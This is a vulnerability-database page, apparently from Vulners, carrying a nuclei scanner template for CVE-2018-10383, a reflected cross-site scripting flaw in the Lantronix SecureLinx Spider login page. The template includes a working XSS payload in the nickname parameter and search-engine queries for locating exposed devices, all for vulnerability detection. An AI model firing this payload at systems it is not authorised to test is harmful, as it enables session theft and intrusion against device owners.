Lucene search
K

Lantronix SecureLinx Spider (SLS) 2.2+ - Cross-Site Scripting

🗓️ 02 Jul 2026 09:36:57Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 30 Views

Lantronix SecureLinx Spider (SLS) 2.2+ - Cross-Site Scripting CVE-2018-1038

Related
Refs
Code
ReporterTitlePublishedViews
Family
CVE
CVE-2018-10383
2 May 201919:48
cve
Cvelist
CVE-2018-10383
2 May 201919:48
cvelist
EUVD
EUVD-2018-2456
7 Oct 202500:30
euvd
NVD
CVE-2018-10383
2 May 201920:29
nvd
OSV
CVE-2018-10383
2 May 201920:29
osv
Prion
Design/Logic Flaw
2 May 201920:29
prion
id: CVE-2018-10383

info:
  name: Lantronix SecureLinx Spider (SLS) 2.2+ - Cross-Site Scripting
  author: ritikchaddha
  severity: medium
  description: |
    Lantronix SecureLinx Spider (SLS) 2.2+ devices have XSS in the auth.asp login page.
  impact: |
    Attackers can execute arbitrary JavaScript in victims' browsers, potentially stealing session cookies, credentials, or performing actions on behalf of users.
  remediation: |
    Apply the latest security patches from Lantronix or upgrade to a patched firmware version.
  reference:
    - https://github.com/grymer/CVE/blob/master/CVE-2018-10383.md
    - https://nvd.nist.gov/vuln/detail/CVE-2018-10383
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2018-10383
    cwe-id: CWE-79
    epss-score: 0.01912
    epss-percentile: 0.77282
    cpe: cpe:2.3:o:lantronix:securelinx_spider_firmware:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: lantronix
    product: securelinx_spider_firmware
    shodan-query: title:"Lantronix"
    fofa-query: title="Lantronix"
  tags: cve,cve2018,lantronix,securelinx,sls,xss,vuln

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains_any(body, "<title>Lantronix", "Lantronix, Inc")'
        internal: true

  - raw:
      - |
        GET /auth.asp?nickname=%22%3E%3Cstyle%20onload%3D%22alert(document.domain)%22%3E HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "><style onload=\"alert(document.domain)\">")'
          - 'status_code == 200'
        condition: and
# digest: 4b0a00483046022100dcaf7433a8f8e82ff250145bfd0349bccd7ae6cd9d1446fe871726a80639461a022100c2f5e0b126967695ccc9941e6cec2d5a785a7067067dab7e808396251129faa5:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.4Medium risk
Vulners AI Score6.4
CVSS 24.3
CVSS 36.1
EPSS0.01912
30